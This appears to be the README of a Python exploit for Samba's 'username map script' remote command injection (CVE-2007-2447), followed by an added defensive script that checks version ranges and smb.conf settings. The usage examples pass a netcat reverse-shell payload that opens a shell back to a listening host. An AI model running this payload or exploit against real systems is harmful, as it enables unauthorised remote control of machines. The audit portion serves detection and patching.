Python implementation of the 'username map script' RCE exploit for Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).
python3 smbExploit.py <IP> <PORT> <PAYLOAD>
- IP - IP address of the remote machine.
- PORT - (Optional) Port that SMB is running on.
- PAYLOAD - Payload to be executed on the remote machine e.g. reverse shell.
Examples:
python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'
python3 smbExploit.py 192.168.1.2 'nc -e /bin/sh 192.168.1.1 4444'
CVE-2007-2447: Remote Command Injection Vulnerability
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
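
A defender-side check for the condition named above, as an added example that is not part of the original repository: it tests a Samba version string against the range this page states (3.0.20 up to, not including, 3.0.25rc3) and looks for a `username map script` setting in smb.conf text. The function names and the sample configuration are constructed for illustration; distribution packages may carry backported fixes, so a version match is a prompt to verify, not proof.

```python
import re

# Affected range as stated on this page: 3.0.20 up to (not including) 3.0.25rc3.
STAGE = {"pre": 0, "rc": 1}          # pre-releases sort before the final release
LOWER = (3, 0, 20, 2, 0)             # 3.0.20 final
FIXED = (3, 0, 25, 1, 3)             # 3.0.25rc3

def version_key(text):
    """Turn '3.0.24', '3.0.25rc2', '3.0.23d' or '3.0.20-Debian' into a sortable tuple."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:(pre|rc)(\d+)|([a-z]))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Samba version: {text!r}")
    major, minor, patch = (int(g) for g in m.group(1, 2, 3))
    if m.group(4):                   # pre-release or release candidate
        return (major, minor, patch, STAGE[m.group(4)], int(m.group(5)))
    if m.group(6):                   # lettered maintenance release, after the final
        return (major, minor, patch, 3, ord(m.group(6)) - ord("a") + 1)
    return (major, minor, patch, 2, 0)

def in_affected_range(text):
    return LOWER <= version_key(text) < FIXED

def username_map_script(conf_text):
    """Return the 'username map script' value, or None if unset.
    smb.conf ignores case and whitespace in parameter names."""
    joined = re.sub(r"\\\r?\n", "", conf_text)       # join backslash-continued lines
    for line in joined.splitlines():
        line = line.strip()
        if not line or line[0] in "#;[" or "=" not in line:
            continue                                  # blank, comment, section header
        name, value = line.split("=", 1)
        if re.sub(r"\s+", "", name).lower() == "usernamemapscript" and value.strip():
            return value.strip()
    return None

def audit(version, conf_text):
    script = username_map_script(conf_text)
    affected = in_affected_range(version)
    return {"in_affected_range": affected, "username_map_script": script,
            "exposed": affected and script is not None}

# Constructed sample configuration, not taken from any real host.
SAMPLE_CONF = """[global]
   workgroup = LAB
   ; username map = /etc/samba/smbusers
   Username  Map Script = /bin/echo
"""

if __name__ == "__main__":
    print(audit("3.0.20-Debian", SAMPLE_CONF))
```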